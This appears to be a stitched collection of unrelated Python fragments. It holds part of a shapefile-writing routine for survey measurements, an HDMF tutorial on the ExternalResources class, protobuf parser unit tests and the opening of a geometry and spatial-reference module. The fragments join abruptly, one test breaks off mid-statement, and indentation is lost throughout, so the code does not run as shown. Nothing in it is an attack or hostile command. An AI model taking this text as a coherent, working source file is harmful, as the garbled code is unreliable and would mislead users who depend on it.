w.field('cor_X', 'N', decimal=4)
w.field('cor_Y', 'N', decimal=4)
w.field('cor_Z', 'N', decimal=4)
w.field('max_cor', 'N', decimal=4)
w.field('nStat_X', 'N', decimal=4)
w.field('nStat_Y', 'N', decimal=4)
w.field('nStat_Z', 'N', decimal=4)
w.field('max_nStat', 'N', decimal=4)
for x in x_msrs:
lon1 = stns[x_msrs[x]['Stn1']]['L']
lat1 = stns[x_msrs[x]['Stn1']]['P']
lon2 = stns[x_msrs[x]['Stn2']]['L']
lat2 = stns[x_msrs[x]['Stn2']]['P']
w.line([
[[lon1, lat1], [lon2, lat2]]
])
w.record(x_msrs[x]['Stn1'], x_msrs[x]['Stn2'],
x_msrs[x]['Msr_X'], x_msrs[x]['Msr_Y'], x_msrs[x]['Msr_Z'],
x_msrs[x]['Msr_SD_X'], x_msrs[x]['Msr_SD_Y'], x_msrs[x]['Msr_SD_Z'],
x_msrs[x]['Adj_X'], x_msrs[x]['Adj_Y'], x_msrs[x]['Adj_Z'],
x_msrs[x]['Cor_X'], x_msrs[x]['Cor_Y'], x_msrs[x]['Cor_Z'], x_msrs[x]['Max_Cor'],
x_msrs[x]['nStat_X'], x_msrs[x]['nStat_Y'], x_msrs[x]['nStat_Z'], x_msrs[x]['Max_nStat']
)
w.close()
# ----------------------------------------------------------------------
# write y_msrs
# ----------------------------------------------------------------------
if y_msrs:
print(" writing type Y msr shapefile ...")
write_prj(y_msr_name, ref_frame)
w = shapefile.Writer(y_msr_name, shapeType=1) # type 1 for points.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
# w.field('Stn2', 'C', size=20)
w.field('msr_X', 'N', decimal=4)
w.field('msr_Y', 'N', decimal=4)
w.field('msr_Z', 'N', decimal=4)
w.field('StdDev_X', 'N', decimal=4)
w.field('StdDev_Y', 'N', decimal=4)
w.field('StdDev_Z', 'N', decimal=4)
w.field('adj_X', 'N', decimal=4)
w.field('adj_Y', 'N', decimal=4)
w.field('adj_Z', 'N', decimal=4)
w.field('cor_X', 'N', decimal=4)
w.field('cor_Y', 'N', decimal=4)
| |
"""
ExternalResources
=============================
This is a user guide to interacting with the ``ExternalResources`` class.
The ExternalResources type is experimental and is subject to change in future releases.
If you use this type, please provide feedback to the HDMF team so that we can
improve the structure and access of data stored with this type for your use cases.
"""
###############################################################################
# Introduction
# ------------------------------------------------------
# The :py:class:`~hdmf.common.resources.ExternalResources` class provides a way
# to organize and map user terms (keys) to multiple resources and entities
# from the resources. A typical use case for external resources is to link data
# stored in datasets or attributes to ontologies. For example, you may have a
# dataset ``country`` storing locations. Using
# :py:class:`~hdmf.common.resources.ExternalResources` allows us to link the
# country names stored in the dataset to an ontology of all countries, enabling
# more rigid standardization of the data and facilitating data query and
# introspection.
#
# From a user's perspective, one can think of the ``ExternalResources`` as a
# simple table, in which each row associates a particular ``key`` stored in a
# particular ``object`` (i.e., Attribute or Dataset in a file) with a particular
# ``entity`` (e.g., a term) of an online ``resource`` (e.g., an ontology).
# That is, ``(object, key)`` refer to parts inside a file and ``(resource, entity)``
# refer to an external resource outside of the file, and ``ExternalResources``
# allows us to link the two. To reduce data redundancy and improve data integrity,
# ``ExternalResources`` stores this data internally in a collection of
# interlinked tables.
#
# * :py:class:`~hdmf.common.resources.KeyTable` where each row describes a
# :py:class:`~hdmf.common.resources.Key`
# * :py:class:`~hdmf.common.resources.ResourceTable` where each row describes a
# :py:class:`~hdmf.common.resources.Resource`
# * :py:class:`~hdmf.common.resources.EntityTable` where each row describes an
# :py:class:`~hdmf.common.resources.Entity`
# * :py:class:`~hdmf.common.resources.ObjectTable` where each row describes an
# :py:class:`~hdmf.common.resources.Object`
# * :py:class:`~hdmf.common.resources.ObjectKeyTable` where each row describes an
# :py:class:`~hdmf.common.resources.ObjectKey` pair identifying which keys
# are used by which objects.
#
# The :py:class:`~hdmf.common.resources.ExternalResources` class then provides
# convenience functions to simplify interaction with these tables, allowing users
# to treat ``ExternalResources`` as a single large table as much as possible.
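# As a plain-Python illustration (not the HDMF API), the factoring of one flat
# ``(object, key) -> (resource, entity)`` row into the interlinked tables can be
# sketched as below; all table contents here are invented for the example.

```python
# Each list stands in for one of the interlinked tables.
keys = ["Homo sapiens"]                                                   # KeyTable
resources = [("NCBI_Taxonomy", "https://www.ncbi.nlm.nih.gov/taxonomy")]  # ResourceTable
entities = [(0, 0, "NCBI:txid9606")]   # EntityTable rows: (key_idx, resource_idx, entity_id)
objects = [("obj-1", "species")]       # ObjectTable rows: (object_id, field)
object_keys = [(0, 0)]                 # ObjectKeyTable rows: (object_idx, key_idx)

# Reassemble the flat (object, key, resource, entity) view that the
# convenience functions present to the user:
flat = [
    (objects[obj_idx][0], keys[key_idx], resources[res_idx][0], entity_id)
    for obj_idx, key_idx in object_keys
    for k_idx, res_idx, entity_id in entities
    if k_idx == key_idx
]
```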
###############################################################################
# Rules to ExternalResources
# ------------------------------------------------------
# When using the :py:class:`~hdmf.common.resources.ExternalResources` class, there
# are rules to how users store information in the interlinked tables.
#
# 1. Multiple :py:class:`~hdmf.common.resources.Key` objects can have the same name.
# They are disambiguated by the :py:class:`~hdmf.common.resources.Object` associated
# with each. I.e., we may have keys with the same name in different objects, but for a particular object
# all keys must be unique. This means the :py:class:`~hdmf.common.resources.KeyTable` may contain
# duplicate entries, but the :py:class:`~hdmf.common.resources.ObjectKeyTable` then must not assign
# duplicate keys to the same object.
# 2. In order to query specific records, the :py:class:`~hdmf.common.resources.ExternalResources` class
# uses '(object_id, relative_path, field, Key)' as the unique identifier.
# 3. :py:class:`~hdmf.common.resources.Object` can have multiple :py:class:`~hdmf.common.resources.Key`
# objects.
# 4. Multiple :py:class:`~hdmf.common.resources.Object` objects can use the same :py:class:`~hdmf.common.resources.Key`.
# Note that the :py:class:`~hdmf.common.resources.Key` may already be associated with resources
# and entities.
# 5. Do not use the private methods to add into the :py:class:`~hdmf.common.resources.KeyTable`,
# :py:class:`~hdmf.common.resources.ResourceTable`, :py:class:`~hdmf.common.resources.EntityTable`,
# :py:class:`~hdmf.common.resources.ObjectTable`, :py:class:`~hdmf.common.resources.ObjectKeyTable`
# individually.
# 6. URIs are optional, but highly recommended. If not known, an empty string may be used.
# 7. An entity ID should be the unique string identifying the entity in the given resource.
# This may or may not include a string representing the resource and a colon.
# Use the format provided by the resource. For example, Identifiers.org uses the ID ``ncbigene:22353``
# but the NCBI Gene uses the ID ``22353`` for the same term.
# 8. In a majority of cases, :py:class:`~hdmf.common.resources.Object` objects will have an empty string
# for 'field'. The :py:class:`~hdmf.common.resources.ExternalResources` class supports compound data_types.
# In that case, 'field' would be the field of the compound data_type that has an external reference.
# 9. In some cases, the attribute that needs an external reference is not a object with a 'data_type'.
# The user must then use the nearest object that has a data type to be used as the parent object. When
# adding an external resource for an object with a data type, users should not provide an attribute.
# When adding an external resource for an attribute of an object, users need to provide
# the name of the attribute.
###############################################################################
# Creating an instance of the ExternalResources class
# ------------------------------------------------------
# sphinx_gallery_thumbnail_path = 'figures/gallery_thumbnail_externalresources.png'
from hdmf.common import ExternalResources
from hdmf.common import DynamicTable
from hdmf import Data
import numpy as np
# Ignore experimental feature warnings in the tutorial to improve rendering
import warnings
warnings.filterwarnings("ignore", category=UserWarning, message="ExternalResources is experimental*")
er = ExternalResources(name='example')
###############################################################################
# Using the add_ref method
# ------------------------------------------------------
# :py:func:`~hdmf.common.resources.ExternalResources.add_ref`
# is a wrapper function provided by the ``ExternalResources`` class that
# simplifies adding data. Using ``add_ref`` allows us to treat new entries similar
# to adding a new row to a flat table, with ``add_ref`` taking care of populating
# the underlying data structures accordingly.
data = Data(name="species", data=['Homo sapiens', 'Mus musculus'])
er.add_ref(
container=data,
key='Homo sapiens',
resource_name='NCBI_Taxonomy',
resource_uri='https://www.ncbi.nlm.nih.gov/taxonomy',
entity_id='NCBI:txid9606',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=9606'
)
key, resource, entity = er.add_ref(
container=data,
key='Mus musculus',
resource_name='NCBI_Taxonomy',
resource_uri='https://www.ncbi.nlm.nih.gov/taxonomy',
entity_id='NCBI:txid10090',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=10090'
)
# Print result from the last add_ref call
print(key)
print(resource)
print(entity)
###############################################################################
# Using the add_ref method with get_resource
# ------------------------------------------------------
# When adding references to resources, you may want to refer to multiple entities
# within the same resource. Resource names are unique, so if you call ``add_ref``
# with the name of an existing resource, then that resource will be reused. You
# can also use the :py:func:`~hdmf.common.resources.ExternalResources.get_resource`
# method to get the ``Resource`` object and pass that in to ``add_ref`` to
# reuse an existing resource.
# Let's create a new instance of ExternalResources.
er = ExternalResources(name='example')
data = Data(name="species", data=['Homo sapiens', 'Mus musculus'])
er.add_ref(
container=data,
key='Homo sapiens',
resource_name='NCBI_Taxonomy',
resource_uri='https://www.ncbi.nlm.nih.gov/taxonomy',
entity_id='NCBI:txid9606',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=9606'
)
# Using get_resource
existing_resource = er.get_resource('NCBI_Taxonomy')
er.add_ref(
container=data,
key='Mus musculus',
resources_idx=existing_resource,
entity_id='NCBI:txid10090',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=10090'
)
###############################################################################
# Using the add_ref method with a field
# ------------------------------------------------------
# It is important to keep in mind that when adding an :py:class:`~hdmf.common.resources.Object` to
# the :py:class:`~hdmf.common.resources.ObjectTable`, the parent object identified by
# :py:class:`~hdmf.common.resources.Object.object_id` must be the closest parent to the target object
# (i.e., :py:class:`~hdmf.common.resources.Object.relative_path` must be the shortest possible path and
# as such cannot contain any objects with a ``data_type`` and associated ``object_id``).
# A common example would be with the :py:class:`~hdmf.common.table.DynamicTable` class, which holds
# :py:class:`~hdmf.common.table.VectorData` objects as columns. If we wanted to add an external
# reference on a column from a :py:class:`~hdmf.common.table.DynamicTable`, then we would use the
# column as the object and not the :py:class:`~hdmf.common.table.DynamicTable` (Refer to rule 9).
# Note: :py:func:`~hdmf.common.resources.ExternalResources.add_ref` internally resolves the object
# to the closest parent, so that er.add_ref(container=genotypes, attribute='genotype_name') and
# er.add_ref(container=genotypes.genotype_name, attribute=None) will ultimately both use the object_id
# of the genotypes.genotype_name VectorData column and not the object_id of the genotypes table.
genotypes = DynamicTable(name='genotypes', description='My genotypes')
genotypes.add_column(name='genotype_name', description="Name of genotypes")
genotypes.add_row(id=0, genotype_name='Rorb')
er.add_ref(
container=genotypes,
attribute='genotype_name',
key='Rorb',
resource_name='MGI Database',
resource_uri='http://www.informatics.jax.org/',
entity_id='MGI:1346434',
entity_uri='http://www.informatics.jax.org/marker/MGI:1343464'
)
###############################################################################
# Using the get_keys method
# ------------------------------------------------------
# The :py:func:`~hdmf.common.resources.ExternalResources.get_keys` method
# returns a :py:class:`~pandas.DataFrame` of ``key_name``, ``resource_table_idx``, ``entity_id``,
# and ``entity_uri``. You can either pass a single key object,
# a list of key objects, or leave the input parameters empty to return all.
# All Keys
er.get_keys()
# Single Key
er.get_keys(keys=er.get_key('Homo sapiens'))
# List of Specific Keys
er.get_keys(keys=[er.get_key('Homo sapiens'), er.get_key('Mus musculus')])
###############################################################################
# Using the get_key method
# ------------------------------------------------------
# The :py:func:`~hdmf.common.resources.ExternalResources.get_key`
# method will return a ``Key`` object. In the current version of ``ExternalResources``,
# duplicate keys are allowed; however, each key needs a unique linking Object.
# In other words, each combination of (container, relative_path, field, key) can exist only once in
# ``ExternalResources``.
# The get_key method will return the key object of the unique (key, container, relative_path, field).
key_object = er.get_key(key_name='Rorb', container=genotypes.columns[0])
###############################################################################
# Using the add_ref method with a key_object
# ------------------------------------------------------
# Multiple :py:class:`~hdmf.common.resources.Object` objects can use the same
# :py:class:`~hdmf.common.resources.Key`. To use an existing key when adding
# new entries into ``ExternalResources``, pass the :py:class:`~hdmf.common.resources.Key`
# object instead of the 'key_name' to the ``add_ref`` method. If a 'key_name' is used,
# a new Key will be created.
def test_nesting_in_message():
proto = """
|message FieldOptions {
| optional CType ctype = 1[old_default = STRING, deprecated = true];
| enum CType {
| STRING = 0[(opt_a) = 1, (opt_b) = 2];
| };
| // Clients can define custom options in extensions of this message. See above.
| extensions 500;
| extensions 1000 to max;
|}
"""
proto = trim_margin(proto)
enum_element = EnumElement(
location=location.at(3, 3),
name="CType",
constants=[
EnumConstantElement(
location=location.at(4, 5),
name="STRING",
tag=0,
options=[
OptionElement("opt_a", OptionElement.Kind.NUMBER, "1", True),
OptionElement("opt_b", OptionElement.Kind.NUMBER, "2", True)
]
)
],
)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="CType",
name="ctype",
tag=1,
options=[
OptionElement("old_default", OptionElement.Kind.ENUM, "STRING"),
OptionElement("deprecated", OptionElement.Kind.BOOLEAN, "true")
]
)
assert len(field.options) == 2
assert OptionElement("old_default", OptionElement.Kind.ENUM, "STRING") in field.options
assert OptionElement("deprecated", OptionElement.Kind.BOOLEAN, "true") in field.options
message_element = MessageElement(
location=location.at(1, 1),
name="FieldOptions",
fields=[field],
nested_types=[enum_element],
extensions=[
ExtensionsElement(
location=location.at(7, 3),
documentation="Clients can define custom options in extensions of this message. See above.",
values=[500]
),
ExtensionsElement(location.at(8, 3), "", [KotlinRange(1000, MAX_TAG_VALUE)])
]
)
expected = ProtoFileElement(location=location, types=[message_element])
actual = ProtoParser.parse(location, proto)
assert actual == expected
def test_multi_ranges_extensions():
proto = """
|message MeGustaExtensions {
| extensions 1, 5 to 200, 500, 1000 to max;
|}
"""
proto = trim_margin(proto)
message_element = MessageElement(
location=location.at(1, 1),
name="MeGustaExtensions",
extensions=[
ExtensionsElement(
                location=location.at(2, 3), values=[1, KotlinRange(5, 200), 500, KotlinRange(1000, MAX_TAG_VALUE)]
)
]
)
expected = ProtoFileElement(location=location, types=[message_element])
actual = ProtoParser.parse(location, proto)
assert actual == expected
def test_option_parentheses():
proto = """
|message Chickens {
| optional bool koka_ko_koka_ko = 1[old_default = true];
| optional bool coodle_doodle_do = 2[(delay) = 100, old_default = false];
| optional bool coo_coo_ca_cha = 3[old_default = true, (delay) = 200];
| optional bool cha_chee_cha = 4;
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
types=[
MessageElement(
location=location.at(1, 1),
name="Chickens",
fields=[
FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="bool",
name="koka_ko_koka_ko",
tag=1,
options=[OptionElement("old_default", OptionElement.Kind.BOOLEAN, "true")]
),
FieldElement(
location=location.at(3, 3),
label=Field.Label.OPTIONAL,
element_type="bool",
name="coodle_doodle_do",
tag=2,
options=[
OptionElement("delay", OptionElement.Kind.NUMBER, "100", True),
OptionElement("old_default", OptionElement.Kind.BOOLEAN, "false")
]
),
FieldElement(
location=location.at(4, 3),
label=Field.Label.OPTIONAL,
element_type="bool",
name="coo_coo_ca_cha",
tag=3,
options=[
OptionElement("old_default", OptionElement.Kind.BOOLEAN, "true"),
OptionElement("delay", OptionElement.Kind.NUMBER, "200", True)
]
),
FieldElement(
location=location.at(5, 3),
label=Field.Label.OPTIONAL,
element_type="bool",
name="cha_chee_cha",
tag=4
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_imports():
proto = "import \"src/test/resources/unittest_import.proto\";\n"
expected = ProtoFileElement(location=location, imports=["src/test/resources/unittest_import.proto"])
assert ProtoParser.parse(location, proto) == expected
def test_public_imports():
proto = "import public \"src/test/resources/unittest_import.proto\";\n"
expected = ProtoFileElement(location=location, public_imports=["src/test/resources/unittest_import.proto"])
assert ProtoParser.parse(location, proto) == expected
def test_extend():
proto = """
|// Extends Foo
|extend Foo {
| optional int32 bar = 126;
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
extend_declarations=[
ExtendElement(
location=location.at(2, 1),
name="Foo",
documentation="Extends Foo",
fields=[
FieldElement(
location=location.at(3, 3), label=Field.Label.OPTIONAL, element_type="int32", name="bar", tag=126
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_extend_in_message():
proto = """
|message Bar {
| extend Foo {
| optional Bar bar = 126;
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
types=[MessageElement(location=location.at(1, 1), name="Bar")],
extend_declarations=[
ExtendElement(
location=location.at(2, 3),
name="Foo",
fields=[
FieldElement(
location=location.at(3, 5), label=Field.Label.OPTIONAL, element_type="Bar", name="bar", tag=126
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_extend_in_message_with_package():
proto = """
|package kit.kat;
|
|message Bar {
| extend Foo {
| optional Bar bar = 126;
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
package_name="kit.kat",
types=[MessageElement(location=location.at(3, 1), name="Bar")],
extend_declarations=[
ExtendElement(
location=location.at(4, 3),
name="Foo",
fields=[
FieldElement(
location=location.at(5, 5), label=Field.Label.OPTIONAL, element_type="Bar", name="bar", tag=126
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_fqcn_extend_in_message():
proto = """
|message Bar {
| extend example.Foo {
| optional Bar bar = 126;
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
types=[MessageElement(location=location.at(1, 1), name="Bar")],
extend_declarations=[
ExtendElement(
location=location.at(2, 3),
name="example.Foo",
fields=[
FieldElement(
location=location.at(3, 5), label=Field.Label.OPTIONAL, element_type="Bar", name="bar", tag=126
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_fqcn_extend_in_message_with_package():
proto = """
|package kit.kat;
|
|message Bar {
| extend example.Foo {
| optional Bar bar = 126;
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
package_name="kit.kat",
types=[MessageElement(location=location.at(3, 1), name="Bar")],
extend_declarations=[
ExtendElement(
location=location.at(4, 3),
name="example.Foo",
fields=[
FieldElement(
location=location.at(5, 5), label=Field.Label.OPTIONAL, element_type="Bar", name="bar", tag=126
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_default_field_with_paren():
proto = """
|message Foo {
| optional string claim_token = 2[(squareup.redacted) = true];
|}
"""
proto = trim_margin(proto)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="string",
name="claim_token",
tag=2,
options=[OptionElement("squareup.redacted", OptionElement.Kind.BOOLEAN, "true", True)]
)
assert len(field.options) == 1
assert OptionElement("squareup.redacted", OptionElement.Kind.BOOLEAN, "true", True) in field.options
message_element = MessageElement(location=location.at(1, 1), name="Foo", fields=[field])
expected = ProtoFileElement(location=location, types=[message_element])
assert ProtoParser.parse(location, proto) == expected
# Parse \a, \b, \f, \n, \r, \t, \v, \[0-7]{1,3}, and \[xX][0-9a-fA-F]{1,2} escapes
def test_default_field_with_string_escapes():
proto = r"""
|message Foo {
| optional string name = 1 [
| x = "\a\b\f\n\r\t\v\1f\01\001\11\011\111\xe\Xe\xE\xE\x41\x41"
| ];
|}
"""
proto = trim_margin(proto)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="string",
name="name",
tag=1,
options=[
OptionElement(
"x", OptionElement.Kind.STRING,
"\u0007\b\u000C\n\r\t\u000b\u0001f\u0001\u0001\u0009\u0009I\u000e\u000e\u000e\u000eAA"
)
]
)
assert len(field.options) == 1
assert OptionElement(
"x", OptionElement.Kind.STRING,
"\u0007\b\u000C\n\r\t\u000b\u0001f\u0001\u0001\u0009\u0009I\u000e\u000e\u000e\u000eAA"
) in field.options
message_element = MessageElement(location=location.at(1, 1), name="Foo", fields=[field])
expected = ProtoFileElement(location=location, types=[message_element])
assert ProtoParser.parse(location, proto) == expected
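The escape handling exercised by the test above can be sketched with a minimal decoder. This is an illustrative reimplementation, not the parser under test; `decode_escapes` and `_SIMPLE` are made-up names.

```python
import re

# single-character escapes recognised by the lexer
_SIMPLE = {'a': '\a', 'b': '\b', 'f': '\f', 'n': '\n',
           'r': '\r', 't': '\t', 'v': '\v'}

def decode_escapes(s):
    """Decode \\a-style, octal, and hex escapes the way the tests expect."""
    out = []
    i = 0
    while i < len(s):
        c = s[i]
        if c != '\\':
            out.append(c)
            i += 1
            continue
        i += 1
        c = s[i]
        if c in _SIMPLE:
            out.append(_SIMPLE[c])
            i += 1
        elif c in 'xX':
            # one or two hex digits after \x or \X
            m = re.match(r'[0-9a-fA-F]{1,2}', s[i + 1:])
            if m is None:
                raise ValueError('expected a digit after \\x or \\X')
            out.append(chr(int(m.group(0), 16)))
            i += 1 + len(m.group(0))
        elif c in '01234567':
            # one to three octal digits
            m = re.match(r'[0-7]{1,3}', s[i:])
            out.append(chr(int(m.group(0), 8)))
            i += len(m.group(0))
        else:
            out.append(c)
            i += 1
    return ''.join(out)
```

Note how `\1f` decodes as the single-digit octal escape `\1` followed by a literal `f`, matching the expected option value above.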
def test_string_with_single_quotes():
proto = r"""
|message Foo {
| optional string name = 1[default = 'single\"quotes'];
|}
"""
proto = trim_margin(proto)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="string",
name="name",
tag=1,
default_value="single\"quotes"
)
message_element = MessageElement(location=location.at(1, 1), name="Foo", fields=[field])
expected = ProtoFileElement(location=location, types=[message_element])
assert ProtoParser.parse(location, proto) == expected
def test_adjacent_strings_concatenated():
proto = """
|message Foo {
| optional string name = 1 [
| default = "concat "
| 'these '
| "please"
| ];
|}
"""
proto = trim_margin(proto)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="string",
name="name",
tag=1,
default_value="concat these please"
)
message_element = MessageElement(location=location.at(1, 1), name="Foo", fields=[field])
expected = ProtoFileElement(location=location, types=[message_element])
assert ProtoParser.parse(location, proto) == expected
def test_invalid_hex_string_escape():
proto = r"""
|message Foo {
| optional string name = 1 [default = "\xW"];
|}
"""
proto = trim_margin(proto)
    with pytest.raises(IllegalStateException) as exc_info:
        ProtoParser.parse(location, proto)
    assert "expected a digit after \\x or \\X" in exc_info.value.message
def test_service():
proto = """
|service SearchService {
| option (default_timeout) = 30;
|
| rpc Search (SearchRequest) returns (SearchResponse);
| rpc Purchase (PurchaseRequest) returns (PurchaseResponse) {
| option (squareup.sake.timeout) = 15;
| option (squareup.a.b) = {
| value: [
| FOO,
| BAR
| ]
| };
| }
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
services=[
ServiceElement(
location=location.at(1, 1),
name="SearchService",
options=[OptionElement("default_timeout", OptionElement.Kind.NUMBER, "30", True)],
rpcs=[
RpcElement(
location=location.at(4, 3),
name="Search",
request_type="SearchRequest",
response_type="SearchResponse",
response_streaming=False,
request_streaming=False
),
RpcElement(
location=location.at(5, 3),
name="Purchase",
request_type="PurchaseRequest",
response_type="PurchaseResponse",
options=[
OptionElement("squareup.sake.timeout", OptionElement.Kind.NUMBER, "15", True),
OptionElement("squareup.a.b", OptionElement.Kind.MAP, {"value": ["FOO", "BAR"]}, True)
],
request_streaming=False,
response_streaming=False
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_streaming_service():
proto = """
|service RouteGuide {
| rpc GetFeature (Point) returns (Feature) {}
| rpc ListFeatures (Rectangle) returns (stream Feature) {}
| rpc RecordRoute (stream Point) returns (RouteSummary) {}
| rpc RouteChat (stream RouteNote) returns (stream RouteNote) {}
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
services=[
ServiceElement(
location=location.at(1, 1),
name="RouteGuide",
rpcs=[
RpcElement(
location=location.at(2, 3),
name="GetFeature",
request_type="Point",
response_type="Feature",
response_streaming=False,
request_streaming=False
),
RpcElement(
location=location.at(3, 3),
name="ListFeatures",
request_type="Rectangle",
response_type="Feature",
response_streaming=True,
                        # NOTE: upstream Square Wire test mistakenly used request_streaming=True here
                        request_streaming=False,
),
RpcElement(
location=location.at(4, 3),
name="RecordRoute",
request_type="Point",
response_type="RouteSummary",
request_streaming=True,
response_streaming=False,
),
RpcElement(
location=location.at(5, 3),
name="RouteChat",
request_type="RouteNote",
response_type="RouteNote",
request_streaming=True,
response_streaming=True,
)
],
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_hex_tag():
proto = """
|message HexTag {
| required string hex = 0x10;
| required string uppercase_x_hex = 0X11;
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
types=[
MessageElement(
location=location.at(1, 1),
name="HexTag",
fields=[
FieldElement(
location=location.at(2, 3), label=Field.Label.REQUIRED, element_type="string", name="hex", tag=16
),
FieldElement(
location=location.at(3, 3),
label=Field.Label.REQUIRED,
element_type="string",
name="uppercase_x_hex",
tag=17
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_structured_option():
proto = """
|message ExoticOptions {
| option (squareup.one) = {name: "Name", class_name:"ClassName"};
| option (squareup.two.a) = {[squareup.options.type]: EXOTIC};
| option (squareup.two.b) = {names: ["Foo", "Bar"]};
|}
"""
    # TODO: structured options with nested message literals are not supported yet:
    #
    # | option (squareup.three) = {x: {y: 1 y: 2 } }; // NOTE: Omitted optional comma
    # | option (squareup.four) = {x: {y: {z: 1 }, y: {z: 2 }}};
proto = trim_margin(proto)
    option_one_map = {"name": "Name", "class_name": "ClassName"}
# metadata/geom.py
#-------------------------------------------------------------------------------
#
# Vector Geometry Manipulations
#
# Project: XML Metadata Handling
# Authors: <NAME> <<EMAIL>>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2013 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
import re
import sys
import math as m
import numpy as np
from collections import Iterable
from osgeo import ogr ; ogr.UseExceptions()
from osgeo import osr ; osr.UseExceptions()
_gerexURL = re.compile(r"^http://www.opengis.net/def/crs/epsg/\d+\.?\d*/(\d+)$", re.IGNORECASE)
_gerexURN = re.compile(r"^urn:ogc:def:crs:epsg:\d*\.?\d*:(\d+)$", re.IGNORECASE)
_gerexShortCode = re.compile(r"^epsg:(\d+)$", re.IGNORECASE)
#-------------------------------------------------------------------------------
# coordinate transformation
RO = ['readonly']
WO = ['writeonly', 'allocate']
class CTransform(object):
def __init__(self, sr_src, sr_dst):
self._ct = osr.CoordinateTransformation(sr_src, sr_dst)
def __call__(self, xarr, yarr):
if hasattr(np, 'nditer') and isinstance(xarr, np.ndarray) and isinstance(yarr, np.ndarray):
# NumPy array
if xarr.shape != yarr.shape:
raise ValueError("Array shape mismatch!")
itr = np.nditer([xarr, yarr, None, None], [], [RO, RO, WO, WO])
for x, y, u, v in itr:
u[...], v[...], _ = self._ct.TransformPoint(float(x), float(y))
return itr.operands[2], itr.operands[3]
        elif isinstance(xarr, Iterable) and isinstance(yarr, Iterable):
# generic iterables + NumPy prior 'np.nditer'
u, v = [], []
for x, y in zip(xarr, yarr):
_u, _v, _ = self._ct.TransformPoint(float(x), float(y))
u.append(_u)
v.append(_v)
return u, v
else: # assuming scalar values
return self._ct.TransformPoint(float(xarr), float(yarr))[0:2]
#-------------------------------------------------------------------------------
# spatial references
# the most common spatial references
def createSRFromEPSG(epsg):
""" Create OSR Spatial Reference from EPSG number code"""
sr = osr.SpatialReference()
sr.ImportFromEPSG(epsg)
return sr
OSR_WGS84 = createSRFromEPSG(4326)
OSR_USP_N = createSRFromEPSG(32661)
OSR_USP_S = createSRFromEPSG(32761)
OSR_UTM_N = tuple(createSRFromEPSG(32601+i) for i in xrange(60))
OSR_UTM_S = tuple(createSRFromEPSG(32701+i) for i in xrange(60))
def setSR(geom, sr):
    """Assign spatial reference to a geometry and return it."""
geom.AssignSpatialReference(sr)
return geom
def parseSR(srs, debug=False):
if debug:
print >>sys.stderr, "SRS: ", srs
for regex in (_gerexShortCode, _gerexURN, _gerexURL):
match = regex.match(srs)
if match is not None:
return createSRFromEPSG(int(match.group(1)))
if srs[:7] == "PROJCS[":
return osr.SpatialReference(srs)
if srs in (None, "", "NONE"):
return None
raise ValueError("Failed to parse the spatial reference! SRS='%s'"%(srs))
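The EPSG extraction performed by `parseSR` can be demonstrated standalone with the same three regular expressions. This is a self-contained sketch; `epsg_code` is a hypothetical helper, not part of this module.

```python
import re

# the same three spatial-reference patterns used by parseSR above
URL = re.compile(r"^http://www.opengis.net/def/crs/epsg/\d+\.?\d*/(\d+)$", re.IGNORECASE)
URN = re.compile(r"^urn:ogc:def:crs:epsg:\d*\.?\d*:(\d+)$", re.IGNORECASE)
SHORT = re.compile(r"^epsg:(\d+)$", re.IGNORECASE)

def epsg_code(srs):
    """Return the EPSG integer code embedded in a short-code, URN, or URL."""
    for regex in (SHORT, URN, URL):
        match = regex.match(srs)
        if match is not None:
            return int(match.group(1))
    return None
```

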